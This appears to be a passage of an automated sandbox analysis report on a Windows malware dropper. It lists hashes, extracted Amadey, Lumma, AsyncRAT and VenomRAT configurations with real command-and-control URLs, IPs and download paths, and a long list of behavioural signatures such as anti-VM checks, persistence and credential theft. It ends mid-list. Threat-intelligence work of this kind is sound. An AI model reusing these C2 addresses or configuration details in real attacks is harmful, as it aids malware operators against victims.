Analysis
-
max time kernel
72s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
15/03/2025, 13:04
Static task
static1
Behavioral task
behavioral1
Sample
u0k28.exe
Resource
win10v2004-20250314-en
General
-
Target
u0k28.exe
-
Size
3.8MB
-
MD5
17f13fc530bc52f8d837689a67b8962a
-
SHA1
e332280450bb598dd077c17a83165ef5e1521614
-
SHA256
ed48b6b1dea8a414989055de0987c9dff063e456b2fab2d06b48f1fe0a660b10
-
SHA512
59d7153ee618bc965fc51ff8ef74f33c246bc503243b4c52a42bded2ab0ddd9fdac6cbfa6babe5330bff2d29252ef6f3fe575f63a69b6080b258cc20ebce7f71
-
SSDEEP
98304:BMIcaNXmy1sNaz5KVMZ3ZfmUdtIsq2wKu+cWreqvcYtwSyUz+:ZMy1saWEpRdSK1lreFgwqz+
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://citydisco.bet/api
https://crosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://4htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://weaponrywo.digital/api
https://zfurrycomp.top/api
https://htardwarehu.icu/api
https://8cjlaspcorne.icu/api
https://adweaponrywo.digital/api
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://biochextryhub.bet/api
https://q8explorebieology.run/api
https://gadgethgfub.icu/api
https://moderzysics.top/api
https://5ktechmindzs.live/api
https://6codxefusion.top/api
https://7phygcsforum.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://qcitydisco.bet/api
Extracted
asyncrat
| Controller
Default
20.206.204.9:4449
ammmjprqjnqswrieh
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://moderzysics.top/api
https://codxefusion.top/api
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
resource yara_rule behavioral1/files/0x0003000000022b5b-3084.dat VenomRAT behavioral1/memory/1908-3101-0x0000000000150000-0x0000000000168000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0003000000022b5b-3084.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1u87m9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2x8387.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JqGBbm7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 85 5848 powershell.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 4 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
pid Process 11116 powershell.exe 5832 powershell.exe 6808 powershell.exe 6348 powershell.exe 17068 powershell.exe 9864 powershell.exe 3756 powershell.exe 788 powershell.exe 4292 powershell.exe 10688 powershell.exe 3416 powershell.exe 4464 powershell.exe 17092 powershell.exe 5848 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 12 IoCs
flow pid Process 87 4476 rapes.exe 108 424 futors.exe 108 424 futors.exe 108 424 futors.exe 33 4476 rapes.exe 33 4476 rapes.exe 33 4476 rapes.exe 33 4476 rapes.exe 33 4476 rapes.exe 125 4476 rapes.exe 125 4476 rapes.exe 94 4476 rapes.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2576 chrome.exe 5188 chrome.exe 4496 chrome.exe 6960 msedge.exe 5892 msedge.exe 1100 chrome.exe 2340 chrome.exe 6944 msedge.exe 1496 msedge.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2x8387.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1u87m9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1u87m9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2x8387.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation 1u87m9.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation futors.exe -
Executes dropped EXE 23 IoCs
pid Process 1676 1u87m9.exe 4476 rapes.exe 4608 2x8387.exe 5192 3790e4346a.exe 4256 3790e4346a.exe 3144 JqGBbm7.exe 2240 zY9sqWs.exe 3176 Gxtuum.exe 3920 v6Oqdnc.exe 1364 Bthvgkck.exe 2496 Gxtuum.exe 2924 rapes.exe 2288 HmngBpR.exe 5068 SplashWin.exe 1080 SplashWin.exe 1744 ADFoyxP.exe 2476 amnew.exe 424 futors.exe 4088 trano1221.exe 976 trano1221.exe 2532 7T7bCyA.exe 3432 cronikxqqq.exe 4104 cronikxqqq.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 1u87m9.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 2x8387.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine JqGBbm7.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine v6Oqdnc.exe -
Loads dropped DLL 37 IoCs
pid Process 5068 SplashWin.exe 5068 SplashWin.exe 5068 SplashWin.exe 1080 SplashWin.exe 1080 SplashWin.exe 1080 SplashWin.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 2532 7T7bCyA.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe 976 trano1221.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" u0k28.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 9 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: Bthvgkck.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 332 checkip.amazonaws.com 333 checkip.amazonaws.com 343 ip-api.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 9448 powercfg.exe 16964 powercfg.exe 16972 powercfg.exe 16984 powercfg.exe 16980 powercfg.exe 9424 powercfg.exe 9436 powercfg.exe 9440 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00080000000243ac-4299.dat autoit_exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1364 Bthvgkck.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 1676 1u87m9.exe 4476 rapes.exe 4608 2x8387.exe 3144 JqGBbm7.exe 3920 v6Oqdnc.exe 2924 rapes.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5192 set thread context of 4256 5192 3790e4346a.exe 94 PID 1080 set thread context of 5968 1080 SplashWin.exe 112 PID 2548 set thread context of 1680 2548 sihost.exe 120 PID 3432 set thread context of 4104 3432 cronikxqqq.exe 144 -
resource yara_rule behavioral1/memory/976-2510-0x00007FFBD1CD0000-0x00007FFBD22B9000-memory.dmp upx behavioral1/files/0x0007000000024331-2506.dat upx behavioral1/memory/976-2513-0x00007FFBE4AF0000-0x00007FFBE4AFF000-memory.dmp upx behavioral1/memory/976-2512-0x00007FFBE1660000-0x00007FFBE1683000-memory.dmp upx behavioral1/memory/976-2516-0x00007FFBDFF40000-0x00007FFBDFF59000-memory.dmp upx behavioral1/memory/976-2515-0x00007FFBE4020000-0x00007FFBE402D000-memory.dmp upx behavioral1/memory/976-2518-0x00007FFBDF550000-0x00007FFBDF57D000-memory.dmp upx behavioral1/memory/976-2524-0x00007FFBDF080000-0x00007FFBDF0B6000-memory.dmp upx behavioral1/memory/976-2525-0x00007FFBE3CB0000-0x00007FFBE3CBD000-memory.dmp upx behavioral1/memory/976-2514-0x00007FFBDFF60000-0x00007FFBDFF79000-memory.dmp upx behavioral1/memory/976-2534-0x00007FFBDCA10000-0x00007FFBDCADD000-memory.dmp upx behavioral1/memory/976-2533-0x00007FFBD17B0000-0x00007FFBD1CD0000-memory.dmp upx behavioral1/memory/976-2532-0x00007FFBDED60000-0x00007FFBDED93000-memory.dmp upx behavioral1/memory/976-2536-0x00007FFBDC940000-0x00007FFBDCA0F000-memory.dmp upx behavioral1/memory/976-2535-0x00007FFBD1CD0000-0x00007FFBD22B9000-memory.dmp upx behavioral1/memory/976-2542-0x00007FFBD7D70000-0x00007FFBD7E8C000-memory.dmp upx behavioral1/memory/976-2541-0x00007FFBDF210000-0x00007FFBDF236000-memory.dmp upx behavioral1/memory/976-2546-0x00007FFBDFF40000-0x00007FFBDFF59000-memory.dmp upx behavioral1/memory/976-2545-0x00007FFBDFF60000-0x00007FFBDFF79000-memory.dmp upx behavioral1/memory/976-2544-0x00007FFBDF530000-0x00007FFBDF542000-memory.dmp upx behavioral1/memory/976-2543-0x00007FFBD7C80000-0x00007FFBD7CC3000-memory.dmp upx behavioral1/memory/976-2540-0x00007FFBE2CF0000-0x00007FFBE2CFB000-memory.dmp upx behavioral1/memory/976-2539-0x00007FFBDFAD0000-0x00007FFBDFAE4000-memory.dmp upx behavioral1/memory/976-2538-0x00007FFBD7E90000-0x00007FFBD7F17000-memory.dmp upx behavioral1/memory/976-2564-0x00007FFBDD810000-0x00007FFBDD834000-memory.dmp upx behavioral1/memory/976-2565-0x00007FFBD3E30000-0x00007FFBD4079000-memory.dmp upx behavioral1/memory/976-2571-0x00007FFBD67D0000-0x00007FFBD688C000-memory.dmp upx behavioral1/memory/976-2570-0x00007FFBD8830000-0x00007FFBD885E000-memory.dmp upx behavioral1/memory/976-2569-0x00007FFBDCA10000-0x00007FFBDCADD000-memory.dmp upx behavioral1/memory/976-2593-0x00007FFBD7420000-0x00007FFBD744B000-memory.dmp upx behavioral1/memory/976-2592-0x00007FFBDC940000-0x00007FFBDCA0F000-memory.dmp upx behavioral1/memory/976-2568-0x00007FFBD17B0000-0x00007FFBD1CD0000-memory.dmp upx behavioral1/memory/976-2567-0x00007FFBDED60000-0x00007FFBDED93000-memory.dmp upx behavioral1/memory/976-2623-0x00007FFBE2CF0000-0x00007FFBE2CFB000-memory.dmp upx behavioral1/memory/976-2632-0x00007FFBDF210000-0x00007FFBDF236000-memory.dmp upx behavioral1/memory/976-2633-0x00007FFBDED60000-0x00007FFBDED93000-memory.dmp upx behavioral1/memory/976-2636-0x00007FFBDC940000-0x00007FFBDCA0F000-memory.dmp upx behavioral1/memory/976-2646-0x00007FFBD7420000-0x00007FFBD744B000-memory.dmp upx behavioral1/memory/976-2645-0x00007FFBD67D0000-0x00007FFBD688C000-memory.dmp upx behavioral1/memory/976-2644-0x00007FFBD8830000-0x00007FFBD885E000-memory.dmp upx behavioral1/memory/976-2643-0x00007FFBDD810000-0x00007FFBDD834000-memory.dmp upx behavioral1/memory/976-2642-0x00007FFBD3E30000-0x00007FFBD4079000-memory.dmp upx behavioral1/memory/976-2641-0x00007FFBDF530000-0x00007FFBDF542000-memory.dmp upx behavioral1/memory/976-2640-0x00007FFBD7C80000-0x00007FFBD7CC3000-memory.dmp upx behavioral1/memory/976-2639-0x00007FFBD7E90000-0x00007FFBD7F17000-memory.dmp upx behavioral1/memory/976-2638-0x00007FFBDFAD0000-0x00007FFBDFAE4000-memory.dmp upx behavioral1/memory/976-2637-0x00007FFBD7D70000-0x00007FFBD7E8C000-memory.dmp upx behavioral1/memory/976-2635-0x00007FFBDCA10000-0x00007FFBDCADD000-memory.dmp upx behavioral1/memory/976-2634-0x00007FFBD17B0000-0x00007FFBD1CD0000-memory.dmp upx behavioral1/memory/976-2631-0x00007FFBDF550000-0x00007FFBDF57D000-memory.dmp upx behavioral1/memory/976-2630-0x00007FFBE3CB0000-0x00007FFBE3CBD000-memory.dmp upx behavioral1/memory/976-2629-0x00007FFBDF080000-0x00007FFBDF0B6000-memory.dmp upx behavioral1/memory/976-2628-0x00007FFBDFF40000-0x00007FFBDFF59000-memory.dmp upx behavioral1/memory/976-2627-0x00007FFBE4020000-0x00007FFBE402D000-memory.dmp upx behavioral1/memory/976-2626-0x00007FFBDFF60000-0x00007FFBDFF79000-memory.dmp upx behavioral1/memory/976-2625-0x00007FFBE4AF0000-0x00007FFBE4AFF000-memory.dmp upx behavioral1/memory/976-2624-0x00007FFBE1660000-0x00007FFBE1683000-memory.dmp upx behavioral1/memory/976-2622-0x00007FFBD1CD0000-0x00007FFBD22B9000-memory.dmp upx behavioral1/files/0x00070000000243aa-4170.dat upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\rapes.job 1u87m9.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Launches sc.exe 20 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 9364 sc.exe 17028 sc.exe 6176 sc.exe 9708 sc.exe 8408 sc.exe 7116 sc.exe 6612 sc.exe 9640 sc.exe 9496 sc.exe 9192 sc.exe 2400 sc.exe 8396 sc.exe 6932 sc.exe 6540 sc.exe 2472 sc.exe 4548 sc.exe 784 sc.exe 5128 sc.exe 9576 sc.exe 9536 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x002100000000071f-2375.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4628 3432 WerFault.exe 143 17220 2008 WerFault.exe 319 11372 2008 WerFault.exe 319 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JqGBbm7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1u87m9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2x8387.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3790e4346a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u0k28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3790e4346a.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3696 cmd.exe 6428 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened 